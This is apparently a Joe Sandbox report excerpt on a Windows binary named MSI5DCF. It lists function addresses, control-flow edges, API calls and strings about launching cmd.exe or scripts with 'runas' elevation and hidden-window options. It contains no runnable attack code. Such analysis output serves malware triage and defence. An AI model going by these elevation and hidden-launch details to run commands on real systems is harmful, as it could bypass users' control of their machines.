__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34938 ad7755 34932->34938 34933->34932 34936 b00c7b 34934->34936 34937 b00c8c 34934->34937 34966 afc6b0 14 API calls std::_Stofx_v2 34935->34966 34968 afc6b0 14 API calls std::_Stofx_v2 34936->34968 34941 b00d0d 34937->34941 34943 b00ca0 __alloca_probe_16 34937->34943 34944 b00cb3 34937->34944 34938->34813 34938->34822 34973 afc6b0 14 API calls std::_Stofx_v2 34941->34973 34942 b00c64 34967 afc6b0 14 API calls std::_Stofx_v2 34942->34967 34943->34941 34952 b00ccd 34943->34952 34969 b0b127 15 API calls 2 library calls 34944->34969 34947 b00d12 34974 afc6b0 14 API calls std::_Stofx_v2 34947->34974 34950 b00cfa 34975 af70ef 14 API calls __freea 34950->34975 34951 b00cb9 34951->34941 34951->34943 34970 b0c622 6 API calls 2 library calls 34952->34970 34955 b00ce9 34956 b00cf0 34955->34956 34957 b00d01 34955->34957 34971 b00d87 41 API calls 2 library calls 34956->34971 34972 afc6b0 14 API calls std::_Stofx_v2 34957->34972 34960->34918 34961->34920 34962->34922 34963->34927 34964->34933 34965->34931 34966->34942 34967->34933 34968->34927 34969->34951 34970->34955 34971->34950 34972->34950 34973->34947 34974->34950 34975->34933 34976 ad7f70 34979 ad7fd0 GetTokenInformation 34976->34979 34980 ad804e GetLastError 34979->34980 34981 ad7fa8 34979->34981 34980->34981 34982 ad8059 34980->34982 34983 ad809e GetTokenInformation 34982->34983 34984 ad8079 34982->34984 34986 ad8069 codecvt 34982->34986 34983->34981 34988 ad8260 45 API calls 3 library calls 34984->34988 34986->34983 34987 ad8082 34987->34983 34988->34987

                                                                        Executed Functions

                                                                        Function 00AD7660 Relevance: 44.1, APIs: 17, Strings: 8, Instructions: 384libraryloadersleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 ad7660-ad7728 call ad8530 call ad2100 * 2 call ad7db0 9 ad772e-ad773d 0->9 10 ad7a7b-ad7aac call ad1910 GetWindowThreadProcessId 0->10 11 ad773f-ad7747 call ad2750 9->11 12 ad774a-ad7760 call b00d39 9->12 18 ad7aae-ad7ade GetWindowLongW 10->18 19 ad7ae1-ad7ae8 10->19 11->12 12->10 21 ad7766-ad7796 call ad2100 12->21 24 ad7798-ad779b 21->24 25 ad77a0-ad77a4 21->25 24->25 26 ad77aa-ad77af 25->26 27 ad7855-ad78a2 25->27 30 ad77b1-ad77b7 26->30 28 ad78ad-ad78af 27->28 29 ad78a4-ad78aa GetForegroundWindow 27->29 31 ad78bd-ad78cc ShellExecuteExW 28->31 32 ad78b1-ad78bb call ad7af0 28->32 29->28 33 ad77b9-ad77bc 30->33 34 ad77d7-ad77d9 30->34 37 ad78dc-ad78de 31->37 38 ad78ce-ad78d9 call ad7c30 31->38 32->31 39 ad77be-ad77c6 33->39 40 ad77d3-ad77d5 33->40 35 ad77dc-ad77de 34->35 41 ad7816-ad7852 GetWindowsDirectoryW call ad1980 * 2 35->41 42 ad77e0-ad77e5 35->42 45 ad78e0-ad78e6 37->45 46 ad7912-ad7932 call ad7ef0 37->46 38->37 39->34 47 ad77c8-ad77d1 39->47 40->35 41->27 49 ad77e7-ad77ed 42->49 52 ad78ed-ad7907 ShellExecuteExW 45->52 53 ad78e8-ad78eb 45->53 59 ad7938-ad795e GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 46->59 60 ad79cb-ad79d0 46->60 47->30 47->40 55 ad780d-ad780f 49->55 56 ad77ef-ad77f2 49->56 52->46 58 ad7909-ad790d call ad7c30 52->58 53->46 53->52 63 ad7812-ad7814 55->63 61 ad7809-ad780b 56->61 62 ad77f4-ad77fc 56->62 58->46 59->60 66 ad7960-ad7967 59->66 68 ad79f2-ad7a12 call ad7d30 60->68 69 ad79d2-ad79da 60->69 61->63 62->55 67 ad77fe-ad7807 62->67 63->27 63->41 66->60 72 ad7969-ad7982 GetModuleHandleW GetProcAddress 66->72 67->49 67->61 77 ad7a1c-ad7a2d 68->77 78 ad7a14-ad7a17 68->78 69->68 73 ad79dc-ad79ec WaitForSingleObject GetExitCodeProcess 69->73 75 ad79c8 72->75 76 ad7984-ad798c 72->76 73->68 75->60 84 ad7990-ad7993 76->84 79 ad7a2f-ad7a32 77->79 80 ad7a37-ad7a4c 77->80 78->77 79->80 82 ad7a4e-ad7a51 80->82 83 ad7a56-ad7a7a call af7708 80->83 82->83 84->75 85 ad7995-ad79bf Sleep EnumWindows 84->85 85->84 87 ad79c1-ad79c2 BringWindowToTop 85->87 87->75
                                                                        APIs
                                                                        • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00AD781F
                                                                        • GetForegroundWindow.USER32(?,?), ref: 00AD78A4
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AD78C1
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AD78FF
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AD7942
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AD7949
                                                                        • GetProcessId.KERNELBASE(?,?,?,?), ref: 00AD7950
                                                                        • AllowSetForegroundWindow.USER32(00000000), ref: 00AD7953
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00AD7973
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AD797A
                                                                        • Sleep.KERNEL32(00000064,?,?,?), ref: 00AD7997
                                                                        • EnumWindows.USER32(00AD7A90,?), ref: 00AD79B3
                                                                        • BringWindowToTop.USER32(?), ref: 00AD79C2
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00AD79DF
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00AD79EC
                                                                          • Part of subcall function 00AD7D30: CloseHandle.KERNEL32(?,B7207CF4,00000010,00000010,?,?), ref: 00AD7D72
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00AD7A9C
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AD7AB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Window$HandleProcess$AddressExecuteForegroundModuleProcShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                        • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                        • API String ID: 105430343-986041216
                                                                        • Opcode ID: 33aeef31552eb4180e7660e59d2f8fa2ef435e2a2392ec07229233731cb71df3
                                                                        • Instruction ID: ce2d88e7c54011d39bb299dbc5f462b3c342b47827eeac40099eea5d2fa4d4a7
                                                                        • Opcode Fuzzy Hash: 33aeef31552eb4180e7660e59d2f8fa2ef435e2a2392ec07229233731cb71df3
                                                                        • Instruction Fuzzy Hash: 30E1A271A04209DFDB14DFA8C988AEEBBF5FF14310F54816AE516EB391EB349941CB60
                                                                        Function 00AD5F90 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,B7207CF4), ref: 00AD5FA0
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00AD5FA7
                                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00AD5FDC
                                                                        • CloseHandle.KERNEL32(?), ref: 00AD5FF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                        • String ID:
                                                                        • API String ID: 215268677-0
                                                                        • Opcode ID: 6a95de52fa1e2edace98018538bf4761fc2a0ca6163b4188bb538c3267d9e30e
                                                                        • Instruction ID: f1ce71d73b008f128e4aa31db1e0fecf2a415d4d4f1d90c19bb701f5a59bdc0d
                                                                        • Opcode Fuzzy Hash: 6a95de52fa1e2edace98018538bf4761fc2a0ca6163b4188bb538c3267d9e30e
                                                                        • Instruction Fuzzy Hash: 64F01274544301ABE710DF20EC49B9AB7E8BB48704F908819FD85C2260D779D51DDA63
                                                                        Function 00AE1A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCommandLineW.KERNEL32(B7207CF4,?,0000FFFF), ref: 00AE1A4D
                                                                          • Part of subcall function 00AD4EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00AD4EDD
                                                                        • ExitProcess.KERNEL32 ref: 00AE1C27
                                                                          • Part of subcall function 00AD8790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AD880D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                        • String ID: Full command line:
                                                                        • API String ID: 1878577176-831861440
                                                                        • Opcode ID: 72a7922305b2924c2a4b003f55704b7f703502d730dfa9b99c35dc655552cc0c
                                                                        • Instruction ID: ec158330d79fba107dea3b862730f87471b18cd9c2084d52cbe58e0742a01a67
                                                                        • Opcode Fuzzy Hash: 72a7922305b2924c2a4b003f55704b7f703502d730dfa9b99c35dc655552cc0c
                                                                        • Instruction Fuzzy Hash: 095191318101689BCF15EB60CE59BEEB7B5AF55300F1441D9E00AA73A1EF745F88CBA1
                                                                        Function 00AD7FD0 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 152 ad7fd0-ad804c GetTokenInformation 153 ad804e-ad8057 GetLastError 152->153 154 ad80b0-ad80c3 152->154 153->154 155 ad8059-ad8067 153->155 156 ad806e 155->156 157 ad8069-ad806c 155->157 159 ad809e-ad80aa GetTokenInformation 156->159 160 ad8070-ad8077 156->160 158 ad809b 157->158 158->159 159->154 161 ad8079-ad8085 call ad8260 160->161 162 ad8087-ad8098 call af8e90 160->162 161->159 162->158
                                                                        APIs
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00AD7FA8,B7207CF4), ref: 00AD8044
                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00AD7FA8,B7207CF4), ref: 00AD804E
                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00AD7FA8,B7207CF4), ref: 00AD80AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: InformationToken$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 2567405617-0
                                                                        • Opcode ID: 89d427517b0894cbcb10513b7ff84eda7cb3f31c48b7ffe558f49eb86cf1d799
                                                                        • Instruction ID: ae990a6c684246aa7bebcda9da93db056b9d2585aaccb0997fb9e525efadf2e8
                                                                        • Opcode Fuzzy Hash: 89d427517b0894cbcb10513b7ff84eda7cb3f31c48b7ffe558f49eb86cf1d799
                                                                        • Instruction Fuzzy Hash: 6C315E71A00205AFDB24DF99CC45BAFFBF9FB44710F10452AE516A7380DBB5A9048BA0
                                                                        Function 00B0C72B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 167 b0c72b-b0c736 168 b0c744-b0c74a 167->168 169 b0c738-b0c742 167->169 171 b0c763-b0c774 RtlAllocateHeap 168->171 172 b0c74c-b0c74d 168->172 169->168 170 b0c778-b0c783 call afc6b0 169->170 177 b0c785-b0c787 170->177 173 b0c776 171->173 174 b0c74f-b0c756 call b0a8b7 171->174 172->171 173->177 174->170 180 b0c758-b0c761 call b115f6 174->180 180->170 180->171
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B0AFDA,00000001,00000364,?,00000006,000000FF,?,00AFC282,?,?,?), ref: 00B0C76C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 8e776c5141470e898b8c14c936b2901176fff8e30700c602cbfbd58141e3ec2d
                                                                        • Instruction ID: aac7c2e2030a4f13b413d2ad119eb28634a609d216ffd0d7f86033f207c74c45
                                                                        • Opcode Fuzzy Hash: 8e776c5141470e898b8c14c936b2901176fff8e30700c602cbfbd58141e3ec2d
                                                                        • Instruction Fuzzy Hash: C9F054315456296AEB215B669D49A6B3FC8DB52771B248391AD04A61D0DF20DC018AE1

                                                                        Non-executed Functions

                                                                        Function 00AD6EE0 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 519comCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 376 ad6ee0-ad6f31 call ad5f90 379 ad6f55-ad6f8d CoInitialize CoCreateInstance 376->379 380 ad6f33-ad6f50 call ad7660 376->380 382 ad6f8f-ad6f93 379->382 383 ad6f98-ad6fe6 VariantInit 379->383 386 ad74ff-ad7519 call af7708 380->386 385 ad74d8-ad74e1 382->385 393 ad6fe8-ad6fec 383->393 394 ad6ff1-ad7015 IUnknown_QueryService 383->394 388 ad74e9-ad74f4 385->388 389 ad74e3-ad74e5 385->389 390 ad74fc 388->390 391 ad74f6 CoUninitialize 388->391 389->388 390->386 391->390 396 ad74ba-ad74c3 393->396 397 ad7017-ad701b 394->397 398 ad7020-ad703a 394->398 400 ad74cb-ad74d6 VariantClear 396->400 401 ad74c5-ad74c7 396->401 399 ad74a9-ad74b2 397->399 404 ad703c-ad7040 398->404 405 ad7045-ad7066 398->405 399->396 403 ad74b4-ad74b6 399->403 400->385 401->400 403->396 406 ad7498-ad74a1 404->406 409 ad7068-ad706c 405->409 410 ad7071-ad708f 405->410 406->399 407 ad74a3-ad74a5 406->407 407->399 411 ad7487-ad7490 409->411 414 ad709a-ad70b4 410->414 415 ad7091-ad7095 410->415 411->406 412 ad7492-ad7494 411->412 412->406 419 ad70bf-ad70dd 414->419 420 ad70b6-ad70ba 414->420 416 ad7476-ad747f 415->416 416->411 417 ad7481-ad7483 416->417 417->411 424 ad70df-ad70e3 419->424 425 ad70e8-ad7100 CoAllowSetForegroundWindow 419->425 421 ad7465-ad746e 420->421 421->416 423 ad7470-ad7472 421->423 423->416 426 ad7454-ad745d 424->426 427 ad7168-ad7175 SysAllocString 425->427 428 ad7102-ad7104 425->428 426->421 430 ad745f-ad7461 426->430 431 ad7529-ad7571 call ad1910 427->431 432 ad717b 427->432 429 ad710a-ad712d SysAllocString 428->429 433 ad712f-ad7132 429->433 434 ad7138-ad715b SysAllocString 429->434 430->421 442 ad7579-ad7587 431->442 443 ad7573-ad7575 431->443 432->429 433->434 436 ad751f-ad7524 call ae1cb0 433->436 437 ad717d-ad71ff VariantInit 434->437 438 ad715d-ad7160 434->438 436->431 445 ad720a-ad720e 437->445 446 ad7201-ad7205 437->446 438->436 441 ad7166 438->441 441->437 443->442 448 ad740b 445->448 449 ad7214 445->449 447 ad740f-ad744e VariantClear * 4 SysFreeString 446->447 447->426 448->447 450 ad7216-ad7238 449->450 451 ad7240-ad7249 450->451 451->451 452 ad724b-ad72c5 call ad3b40 call ad40a0 call ad61d0 call ad3cc0 451->452 461 ad72c7-ad72d8 452->461 462 ad72f6-ad7315 452->462 465 ad72eb-ad72ed 461->465 466 ad72da-ad72e5 461->466 463 ad731d 462->463 464 ad7317-ad731b 462->464 469 ad7324-ad7326 463->469 464->469 465->462 468 ad72ef-ad72f0 LocalFree 465->468 466->465 467 ad751a call afc5c2 466->467 467->436 468->462 470 ad7328-ad7332 469->470 471 ad73a5-ad73b5 469->471 473 ad7344-ad7378 OpenProcess WaitForSingleObject 470->473 474 ad7334-ad7342 call ad6a60 470->474 475 ad73fc-ad7405 471->475 476 ad73b7-ad73c6 471->476 480 ad737a-ad737c GetExitCodeProcess 473->480 481 ad7382-ad7392 473->481 474->473 475->448 475->450 477 ad73d9-ad73db 476->477 478 ad73c8-ad73d3 476->478 482 ad73dd-ad73de LocalFree 477->482 483 ad73e4-ad73f5 477->483 478->467 478->477 480->481 481->471 485 ad7394-ad739b CloseHandle 481->485 482->483 483->475 485->471
                                                                        APIs
                                                                          • Part of subcall function 00AD5F90: GetCurrentProcess.KERNEL32(00000008,?,B7207CF4), ref: 00AD5FA0
                                                                          • Part of subcall function 00AD5F90: OpenProcessToken.ADVAPI32(00000000), ref: 00AD5FA7
                                                                        • CoInitialize.OLE32(00000000), ref: 00AD6F55
                                                                        • CoCreateInstance.OLE32(00B1D310,00000000,00000004,00B2B320,00000000,?), ref: 00AD6F85
                                                                        • CoUninitialize.OLE32 ref: 00AD74F6
                                                                        • _com_issue_error.COMSUPP ref: 00AD7524
                                                                          • Part of subcall function 00AD1910: LocalFree.KERNEL32(?,B7207CF4,?,00000000,00B192C0,000000FF,?,?,00B31348,00000000,00AD16D0,80004005), ref: 00AD195C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                        • String ID: $
                                                                        • API String ID: 2507920217-3993045852
                                                                        • Opcode ID: 73f8e5b54cd4f7674ed675ec3dab3a85cbe081806fc8384234c3ccaeb7712eb0
                                                                        • Instruction ID: 6862920d640fe7f4edc5adca829475d66ef3a5835e83fbbab769f00efcc71b5f
                                                                        • Opcode Fuzzy Hash: 73f8e5b54cd4f7674ed675ec3dab3a85cbe081806fc8384234c3ccaeb7712eb0
                                                                        • Instruction Fuzzy Hash: 6B228170E04388DFEB15CFA8C948BADBBB4AF45304F14819EE406EB391EB759A45CB51
                                                                        Function 00ADD060 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 472COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf$FreeLocal
                                                                        • String ID: %$+
                                                                        • API String ID: 2429749586-2626897407
                                                                        • Opcode ID: acaaf90eaeddf3b475a3867a0aa921b9ad124ffd396bd3f73029ef8257a09eb4
                                                                        • Instruction ID: 37f954dff710dbd52c06bb422035be8e7cd7092c6d06778de5c9edf492d429cf
                                                                        • Opcode Fuzzy Hash: acaaf90eaeddf3b475a3867a0aa921b9ad124ffd396bd3f73029ef8257a09eb4
                                                                        • Instruction Fuzzy Hash: FA02E171E102199FDB15DFA8DD44BAEBBB5FF49300F14862AF812AB381D734A941CB91
                                                                        Function 00AE0E90 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 455registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 00AE12C4
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00B357C0,00000800), ref: 00AE12E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQueryValue
                                                                        • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                        • API String ID: 4153817207-1914306501
                                                                        • Opcode ID: 933222e45775a19d1aaa8bf6e04d6b1d04c44e800474d7958e4bf98db1a7bdc9
                                                                        • Instruction ID: c1338fe55b9f2265dd2707387ca17b09856a6ab2f9d4459244bf813cd893bdf9
                                                                        • Opcode Fuzzy Hash: 933222e45775a19d1aaa8bf6e04d6b1d04c44e800474d7958e4bf98db1a7bdc9
                                                                        • Instruction Fuzzy Hash: 43E1D135A043E28ACB349F16C840AB6B3E1FF95740F5985ADD949CB695EB71CCC2C3A1
                                                                        Function 00AD61D0 Relevance: 10.7, APIs: 7, Instructions: 234processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD6242
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD6285
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD62E1
                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00AD62FD
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD6445
                                                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00AD6463
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AD648E
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 708755948-0
                                                                        • Opcode ID: c0acbe779f4382eb1e6374cec9ee096aade86f75751951995487c9b9be9f0e45
                                                                        • Instruction ID: 878345988d05be885f951281f007b8d81d2b314e01ece4bc297a84616a8a5318
                                                                        • Opcode Fuzzy Hash: c0acbe779f4382eb1e6374cec9ee096aade86f75751951995487c9b9be9f0e45
                                                                        • Instruction Fuzzy Hash: 7AA16BB1905269DBDB20DF64D948BDEBBB4EF44304F1082DAE419A7390DBB85E84CF90
                                                                        Function 00B14609 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __floor_pentium4
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                        • API String ID: 4168288129-2761157908
                                                                        • Opcode ID: 4be2374b5d7863e952fef966840b97ef91f4b70a8c4b5ded829fb3554afe118f
                                                                        • Instruction ID: f22a2e619664ae852109f170bfb2eb20199e2ac29f8ab99e987f60790e8c5a5c
                                                                        • Opcode Fuzzy Hash: 4be2374b5d7863e952fef966840b97ef91f4b70a8c4b5ded829fb3554afe118f
                                                                        • Instruction Fuzzy Hash: B3D21772E086298FDB65CE28DD847EAB7F5EB85304F5441EAD40DE7240EB74AE818F41
                                                                        Function 00B13BA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00B13EC1,00000002,00000000,?,?,?,00B13EC1,?,00000000), ref: 00B13C3C
